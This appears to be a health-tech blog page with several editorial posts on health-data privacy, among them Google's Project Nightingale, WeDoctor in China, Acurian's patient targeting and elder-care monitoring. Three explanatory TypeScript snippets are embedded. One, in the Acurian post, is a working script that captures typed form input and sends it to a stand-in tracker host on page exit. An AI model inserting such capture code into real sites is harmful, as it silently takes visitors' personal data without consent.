Will the rise of technology mean the fall of privacy–and what can be done? UK seeks a new National Data Guardian.

Can we have data sharing and interoperability while individuals retain control over what they want shared? This keeps surfacing as a concern in the US, UK, Europe, and Australia, especially with COVID testing.

In recent news, last week’s acquisition of Ancestry by Blackstone [TTA 13 August] raised questions in minds other than this Editor’s about how a business model based on the value of genomic data to others can serve two masters: investors, and customers who simply want to know their genetic profile and disease predispositions, and who may be unclear or confused about how to limit where their data goes, however de-identified. The consolidation of digital health companies, practices, and payers–Teladoc and Livongo, CVS Health and Aetna, and even VillageMD and Walgreens–is also dependent on data. Terms you hear are ‘tracking the patient journey’, ‘improving population health’, and a Big ’80s term, ‘synergy’. And this does not include all the platforms that are solely about the data and making it more available in the healthcare universe.

A recent HIMSS virtual session, ‘Dignity-Preserving Technology: Addressing Global Health Disparities in Vulnerable Populations’, reported in Healthcare Finance, addressed the issue in a soft and jargony way that is easy to dismiss. From one of the five panelists:

Dr. Alex Cahana, chief medical officer at ConsenSys Health: “And so if we are in essence our data, then any third party that takes that data – with a partial or even complete agreement of consent from my end, and uses it, abuses it or loses it – takes actually a piece of me as a human.”


But dig into the quote and the further comments, and it’s absolutely true. Most data sharing, most of the time, is helpful. Not having to keep track of everything on paper, being able to store your data digitally, and having your primary care practice or radiologist keep your records and their interpretations accessible all make life easier. The average person tends to block out the possibility of misuse–until it turns around and bites them. So what is the solution? Quite a bit of this discussion was about improving ‘literacy’, which is a Catch-22 of vulnerability: ‘lacking skill and ability’ to understand how their data is being used, versus ‘the system’ actually creating these vulnerable populations. But when the priority, from the government on down to private payers, is ‘value-based care’ and saving money, how does improved literacy prevent ‘nefarious use’ of shared data, or the re-identification of de-identified data for which you, the vulnerable, have given consent?

It’s exhausting. Why not avoid the problem in the first place? Having observed the uses and misuses of genomics data, this Editor will harp on again that we should have a Genomic Data Bill of Rights [TTA 29 Aug 18] that makes fully transparent to consumers where their data is going and how it is being used, and lets them easily keep their data private without jumping through a ridiculous number of hoops. This could be expandable to all health data. While I’d prefer this to be enforced by private entities, I don’t see it having a chance. In the US, we have HIPAA, enforced by HHS’ Office for Civil Rights (OCR), which also watchdogs and fines for internal data breaches. Data privacy is also a problem of international scope, what with data hacking coming from state-sponsored entities in China and North Korea, as well as Eastern European pirates.

Thus it is encouraging that the UK’s Department of Health and Social Care is seeking a new National Data Guardian (NDG) to figure out how to safeguard patient data, a role established in statute by the December 2018 Act. The new NDG replaces Dame Fiona Caldicott, who was the first NDG starting in 2014, well before the Act. The specs for the job in Public Appointments are here. You’ll be paid £45,000 per annum for a 2-3 day week, working primarily remotely with some travel to Leeds and London. (But if you’d like it, apply quickly–it closes 3 Sept!) It’s not full time, which is slightly dismaying given the situation’s growing importance. The HealthcareITNews article has a HIMSS interview video with Dame Fiona discussing the role of trust in this process, starting with the clinician, and why the Care.data program was scrapped. Of related interest is Public Health England’s inter-mortem of lessons learned in data management from COVID-19, while reportedly Health Secretary Matt Hancock is replacing PHE with a new agency solely focused on health protection from pandemics. Hmmmmm….. HealthcareITNews.

Google’s ‘Project Nightingale’–a de facto breach of 10 million health records, or a bridge too far?

Breaking News. Has this finally blown the lid off Google’s quest for data on everyone? This week’s uncovering of, whistleblowing on, and general backlash against Google’s agreement with Ascension Health–the largest non-profit health system in the US and the largest Catholic health system on Planet Earth–revealed by the Wall Street Journal (paywalled), has put a bright light exactly where Google (and Apple, Facebook, and Amazon) do not want it.

Why do these giants want your health data? It’s all about where it can be used and sold. For instance, it can be used in research studies. It can be sold for use in EHR integration. But their services and predictive data are ‘where it’s at’. With enough accumulated data on both your health records and personal life (e.g. not enough exercise, food consumption), their AI and machine learning modeling can predict your health progression (or deterioration), along with probable diagnosis, outcomes, treatment options, and your cost curve. Advertising clicks and merchandising products (baby monitors, PERS, exercise equipment) are only the beginning–health systems and insurers are the main chance. In a worst-case and misuse scenario, the data modeling can make you look like a liability to an employer or an insurer, making you both unemployable and expensive or uninsurable in a private insurance system.
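To make that mechanism concrete, here is a minimal, hypothetical sketch in TypeScript of how accumulated records and lifestyle signals could roll up into a single risk score. The features, weights, and logistic form are all invented for illustration–this describes no actual insurer’s or platform’s model:

```typescript
// Hypothetical illustration only: invented features and weights,
// not any real insurer's or platform's model.
interface PersonProfile {
  ageYears: number;
  chronicDiagnoses: number;      // from health records
  fastFoodOrdersPerWeek: number; // from purchase history
  avgDailySteps: number;         // from a fitness tracker
}

// A toy logistic model: combine the signals into a 0..1 'risk' score.
function riskScore(p: PersonProfile): number {
  const z =
    -3.0 +
    0.04 * p.ageYears +
    0.5 * p.chronicDiagnoses +
    0.15 * p.fastFoodOrdersPerWeek -
    0.0002 * p.avgDailySteps;
  return 1 / (1 + Math.exp(-z)); // logistic link: higher z, higher risk
}

const score = riskScore({
  ageYears: 55,
  chronicDiagnoses: 2,
  fastFoodOrdersPerWeek: 5,
  avgDailySteps: 3000,
});
console.log(score.toFixed(2)); // one number that can price a policy or rank a lead
```

The point is not the arithmetic but the reduction: once disparate data streams are joined to one identity, a single score can follow you to an underwriter or an employer.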

In Google’s latest, their Project Nightingale business associate agreement (BAA) with Ascension Health, permissible under HIPAA, apparently allowed them to access in the initial phase at least 10 million identified health records, transmitted to Google without patient or physician consent or knowledge, including patient names, dates of birth, lab results, diagnoses, and hospital records. This transfer and the Google agreement were announced by Ascension on 11 November. Ultimately, 50 million records are planned to be transferred from Ascension facilities in 21 states. According to a whistleblower on the project quoted in The Guardian, there are real concerns about individuals handling identified data, the depth of the records, how the data is being handled, and how Google will be using it. Ascension doesn’t seem to share that concern, stating that their goal is to “optimize the health and wellness of individuals and communities, and deliver a comprehensive portfolio of digital capabilities that enhance the experience of Ascension consumers, patients and clinical providers across the continuum of care”–a bit of word salad that leads right to Google’s Cloud and G Suite capabilities.

This was enough to kick off an inquiry by Health and Human Services (HHS). A spokesperson confirmed to Healthcare Dive that HHS’ Office for Civil Rights (OCR) is opening an investigation into Project Nightingale. The agency “would like to learn more information about this mass collection of individuals’ medical records with respect to the implications for patient privacy under HIPAA,” OCR Director Roger Severino said in an emailed statement.

Project Nightingale cannot help but aggravate existing antitrust concerns in Congress and among state attorneys general about these companies and their privacy safeguards. Examples are the pushback around Google’s $2.1 bn acquisition of Fitbit–which one observer dubbed ‘extraordinary’ given Fitbit’s recent business challenges–and its purchase of data analytics company Looker. DOJ’s antitrust division has been looking into how Google’s personalized advertising transactions work, and increasingly there are calls from both ends of the US political spectrum to ‘break them up.’ Yahoo News

Google and Ascension Health may very well be the ‘bridge too far’ that curbs the relentless and largely hidden appetite for personal information by Google, Amazon, Apple, and Facebook that is making their own consumers very, very nervous. Transparency, which seems to be a theme in many of these articles, isn’t a solution. Scrutiny, oversight with teeth, and restrictions are.

Also STAT News, The Verge on Google’s real ambitions in healthcare, and a tart take on Google’s recent lack of success with acquisitions in ZDNet, ‘Why everything Google touches turns to garbage’. Healthcare IT News tries to be reassuring, but the devil may be in Google’s tools not being compliant with HIPAA standards. Further down in that article, Readers will see that HIPAA permits a business associate agreement to cover access to the covered entity’s (Ascension’s) PHI only so the business associate can carry out the covered entity’s healthcare functions–not for the business associate’s (Google’s) independent use or purposes.

China’s getting set to be the healthcare AI leader–on the backs of sick, rural citizens’ data privacy

Picture this: a mobile health clinic arrives at a rural village in Jia County, in China’s Henan province. The clinic staff check the villagers, many of them elderly and infirm from their hard-working lives, collecting vital signs and taking blood, urine, ECGs, and other tests. It’s all free, versus going to the hospital 30 miles away.

The catch: the data collected is uploaded to WeDoctor, a private healthcare company specializing in online medical diagnostics and related services, backed by Tencent, the Chinese technology conglomerate which is also devoted to AI. All that data goes to WeDoctor’s AI-powered cloud. The good part: the agreement with the local government that permits this also provides medical services, health insurance, pharmaceuticals, and healthcare education to the local people. In addition, it creates an “auxiliary treatment system for general practice” database that Jia County doctors can access for local patients. According to the WIRED article on this, it’s impressive at an IBM Watson level:

Doctors simply have to input a patient’s symptoms and the system provides them with suggested diagnoses and treatments, calculated from a database of over 5,000 symptoms and 2,000 diseases. WeDoctor claims that the system has an accuracy rate of 90 per cent.

and 

Dr Zhang Qiaofen, in nearby Ren Zhuang village, says the system has made her life easier. “Since WeDoctor came to my clinic, I feel more comfortable and have more confidence,” she says. “I’m thankful to the device for helping me make decisions.”
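WIRED does not describe how WeDoctor’s engine actually works. At its simplest, though, a symptom-to-diagnosis suggester of the kind quoted above–input symptoms, get ranked candidates from a disease/symptom database–can be sketched as below. This is a hypothetical TypeScript toy with invented entries, nowhere near a clinical-grade system:

```typescript
// Toy disease-symptom knowledge base (invented entries; a real system
// would cover on the order of 2,000 diseases and 5,000 symptoms).
const diseaseSymptoms: Record<string, string[]> = {
  "common cold": ["cough", "runny nose", "sore throat"],
  "influenza": ["fever", "cough", "muscle aches", "fatigue"],
  "hypertension": ["headache", "dizziness"],
};

// Rank diseases by the fraction of their known symptoms the patient reports.
function suggestDiagnoses(reported: string[]): [string, number][] {
  const reportedSet = new Set(reported);
  return Object.entries(diseaseSymptoms)
    .map(([disease, symptoms]): [string, number] => {
      const matched = symptoms.filter(s => reportedSet.has(s)).length;
      return [disease, matched / symptoms.length];
    })
    .filter(([, score]) => score > 0)
    .sort((a, b) => b[1] - a[1]);
}

console.log(suggestDiagnoses(["fever", "cough", "fatigue"]));
// -> influenza ranked first
```

A production system would weight symptoms, handle synonyms, and tune itself on those millions of uploaded patient records–which is precisely why the data collection matters.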

The bad part: the patients have given no consent and have no control over the data, nor are there any privacy restrictions on its use by WeDoctor, Tencent, or the Chinese government. Regional government officials are next pictured in the article reviewing data on Jia County’s citizens: village, gender, age, ailment, and whether or not a person has registered with a village health check. Yes, attending these health checks is mandatory for the villagers.

What is happening is that China is building the world’s largest medical database, free of those pesky Western democracy privacy restrictions, and using AI/machine learning to create a massive set of diagnostic tools. The immediate application is to supplement their paucity of doctors and medical facilities (1.5 doctors per 1,000 people compared to almost double in the UK). All this is being built by an estimated 130 private companies as part of the “Made in China 2025” plan. Long term, the Chinese government gets to know even more intimate details about their 1.3 billion citizens. And these private companies can make money off the data. Such a deal! The difference between China’s attitude towards privacy and Western concerns on same could not be greater.  More on WeDoctor’s ambitions to be the Amazon of healthcare and yes, profit from this data, from Bloomberg. WeDoctor is valued at an incredible $5.5 billion. Hat tip to HISTalk’s Monday morning update.

Creepy data mining on medical conditions runs wild: where’s the privacy?

Ever heard of AcurianHealth? If you are in the US, you may get a letter for one of their research studies or drug trials based upon your prescriptions, your shopping habits, or your internet browsing. Where do they get that data? Some of it quite legitimately: based on consent, Walgreens Boots will mail invitations for studies organized by Acurian to its pharmacy customers, with user identification withheld from Acurian. The privacy policy under which Walgreens does business with you permits this type of contact. These letters direct users to a generic-sounding website for the study–and then life gets interesting. A visit to the site, whether from a letter, a search, or an online ad, may capture your information. A bit of code from a company Acurian works with, NaviStone, captures information from partial or unsent information requests or signups. NaviStone then matches what you think is anonymous behavior against other databases, and voilà, mail is sent to you via their ‘proprietary technology.’ Acurian uses databases from large data broker/aggregators like Epsilon and cranks away. It’s creepy behavior that stretches the definition of privacy and consent. Not reassuring is that Acurian has a database of over 100 million people who are supposedly opt-ins. How a Company You’ve Never Heard of Sends You Letters about Your Medical Condition (Gizmodo) Hat tip to Toni Bunting
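Gizmodo describes NaviStone’s code as capturing what visitors type even if they never press Submit. The sketch below is not NaviStone’s actual code–it is a hypothetical TypeScript illustration, with an invented collector endpoint, of how easily any third-party script embedded in a page could do the same:

```typescript
// Illustrative only: how an embedded third-party script *could* capture
// form input before the visitor ever presses Submit.
const collectorUrl = "https://tracker.example.com/collect"; // hypothetical endpoint

const captured: Record<string, string> = {};

// Watch every input and textarea on the page.
document
  .querySelectorAll<HTMLInputElement | HTMLTextAreaElement>("input, textarea")
  .forEach(field => {
    // Keep the latest value on every keystroke, even if the form is abandoned.
    field.addEventListener("input", () => {
      captured[field.name || field.id] = field.value;
    });
  });

// When the visitor leaves–submitted or not–beacon whatever was typed.
window.addEventListener("pagehide", () => {
  navigator.sendBeacon(collectorUrl, JSON.stringify(captured));
});
```

Note that nothing here waits for a submit event: the beacon fires on page exit, so a half-filled, abandoned form is not as private as it feels.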

How technology can help fight elder abuse–ethically

The increasing awareness of abuse of older people by their caregivers, whether at home or in care homes/assisted living/nursing homes, invites discussion of the role technology can play. This presentation by Malcolm J. Fisk, PhD, co-director of the Age Research Centre at Coventry University, in the BSG Ageing Bites series on YouTube, looks at technologies by their level of control and intrusiveness:

  • Social alarms, which include pull cords (nurse call) and PERS–what we think of as ‘1st generation’ telecare: high level of control, low intrusiveness–but often useless if the person cannot reach them in an emergency
  • Activity monitoring, which can be room sensor-based or wearable (the 2nd generation): less control, slightly more intrusive–also dependent on monitoring and subject to false positives/negatives
  • Audio and video monitoring, while achieving greater security, are largely uncontrolled by the older person and highly intrusive to the point of unacceptability. (In fact, some feedback on tablet-based telehealth devices indicates that a built-in camera, even if not activated, can be regarded with suspicion and trigger unwanted reactions.)

The issues of consent, and the balance between autonomy and privacy on one hand, and factors such as cognitive impairment, personal safety and, this Editor would add, detecting attacks by strangers rather than caregivers on the other, are explored here. How do we ethically observe yet respect individual privacy? This leads to a set of seven principles Dr Fisk has published on guiding the use of surveillance technologies within care homes in the latest issue of Emerald|Insight (unfortunately abstract access only). Video 11:03. Hat tip to Malcolm Fisk via Twitter.

Dr Topol’s prescription for The Future of Medicine, analyzed

The Future of Medicine Is in Your Smartphone sounds like a preface to Dr Topol’s latest book, ‘The Patient Will See You Now’, but it is quite consistent with his talks of late [TTA 5 Dec]. The article is at once optimistic–yes, we love the picture–yet somewhat unreal. When we walk around and kick the tires…

First, it flies in the face of the increasing control of healthcare providers by government as to outcomes, and the shift, for good or ill, to ‘outcomes-based medicine’. Second, ‘doctorless patients’ may need fewer services, not more–and why should these individuals, who at least initially represent the high-info elite, be penalized by having to pay the extremely high premiums dictated by government-approved health insurance (in the US, ACA-compliant insurance a/k/a Obamacare)–or face the US tax penalties for not enrolling in same? Third, those liberating mass-market smartwatches and fitness trackers aren’t clinical quality yet–fine directionally, but real clinical diagnosis (more…)

What happens when a medical app…vanishes?

You have just entered The App Twilight Zone…. Our readers know that concussion and its diagnosis have been a focus of this Editor’s, and validating apps a focus of Editor Charles’, who brought this to my attention. The app’s name: The Sport Concussion Assessment Tool 2 (SCAT2). The news report states: “It contains all the essentials you would want in a concussion app: a graded symptoms checklist, cognitive testing, balance testing, Glasgow coma scale, Maddocks score, baseline score ability, serial evaluation, and password protected information-sharing via email.” The plot: it was deactivated without warning or notice by the developer, Inovapp (link to sketchy CrunchBase profile), yet it is still listed on the iTunes store.

What happened? A revised standard (SCAT3) was developed in 2012, updating SCAT2 with non-critical additions: indications for emergency management, a slightly more extensive background section, a neck exam, and more detailed return-to-play instructions. SCAT3 is only available on (inconvenient) paper. No word from Inovapp on why it discontinued the app, nor on any plans for an update.

The SCAT2 had gained, in a short time, a following among coaches and sports medicine professionals because it was the first app based upon the international standard (Zurich, 2008, 3rd International Conference on Concussion in Sport), transferring a paper assessment tool to an easy-to-use app; the NHL (National Hockey League) even has its own version. Users have a right to be upset at being stranded short of the revised 2012 standards, but moreover, this points to a glaring shortcoming of medical apps: their developers vanishing into the night without a by-your-leave. And read the comments by (mainly) doctors on securing patient information after the app is used (HIPAA standards), and one physician’s criticism of apps such as this as a ‘crutch’. A Pointer to the Future we don’t want to see. The authors Irfan Husain and Iltifat Husain, MD, are to be congratulated. Popular app being used to manage concussions fails, failing patients (iMedicalApps)

Eye feels the pain of Google’s Brin and Page

Oh, the discomfort that Sergey and Larry must be feeling being grilled–er, interviewed–by “billionaire venture capitalist Vinod Khosla” (grudgingly respected in TTA 30 May) at one of his eponymous Summits. Here they are with Google Glass in all sorts of adaptations from Parkinson’s to gait improvement to surgery [see multiple TTA articles here], a ‘moonshot on aging and longevity’ dubbed Calico [TTA 19 Sept 13], and even a contact lens to measure blood glucose in tears [TTA 17 Jan]. All good stuff with Big Change potential. Instead they whinge on about how the health field is so regulated, and all the cool stuff you could do with the data but for that privacy thingy (those darn EU and UK regulations and, in the US, HIPAA). Page to Khosla: “I do worry that we regulate ourselves out of some really great possibilities that are certainly on the data-mining end.” Brin to Khosla: “Generally, health is just so heavily regulated. It’s just a painful business to be in. It’s just not necessarily how I want to spend my time.” Gee. Whiz. What is apparent here is a lack of respect for the privacy of us ‘little folks’ and our everyday, humdrum lives.

Advice straight from The Gimlet Eye: My dear boys, you’ll just have to get people’s data with that old-fashioned thing, permission. (And you’d be surprised how many would be happy to give it to you.) Or if it’s all too painful, Sergey can play with his superyacht and latest girlfriend, and follow his estranged wife Anne Wojcicki’s 23andMe and its ongoing dealings with the FDA. At least she’s in the arena. Google leaders think health is ‘a painful business to be in’ (SFGate) Mobihealthnews covers their true confessions, with an interesting veer off in the final third of the article to Mr Khosla’s view of Ginger.io’s surprising pilot with Kaiser, and then to WellDoc’s BlueStar diabetes therapy app–the only one that is 510(k) Class II and registered as a pharmaceutical product [TTA 10 Jan]. Also interesting re the Googlers’ mindset is a SFGate blog piece on Larry Page’s attitudes towards leisure and work in a Keynes-redux ‘vision of the future’. Less work + more people may = more leisure, but certainly much less $£€¥ for even the well-educated and managerial!

Are mHealth apps sharing your data with pharma and insurance companies?

As a further postscript to our recent post on mHealth apps, the Financial Times has just published an article offering a worrying new angle. According to the FT, the “top 20” health & wellness apps are sharing data on you with third parties that, the FT reckons, may include pharmaceutical and insurance companies.

They report that: “Regulations bar the tracking and selling of individuals’ specific medical and prescription records. Yet some companies are figuring out ways around those restrictions by building digital health profiles about people based on their use of the web and mobile apps.”

Perhaps a case of reading those Ts & Cs carefully before pressing ‘accept’?

The amazing lightness of Google’s Being There vs The Private Eye

Perhaps it is The Google Gimlet Eye’s peevishness at this late hour, but mentioning this company in conjunction with ‘privacy’ lately makes the Eye Goggle. First there is the sheer howling irony of chairman Eric Schmidt’s interesting definition of the Digital Dark Side in this past weekend’s Wall Street Journal, a state of data mining and real-time behavioral monitoring that applies to totalitarian regimes like North Korea, Iran or (more…)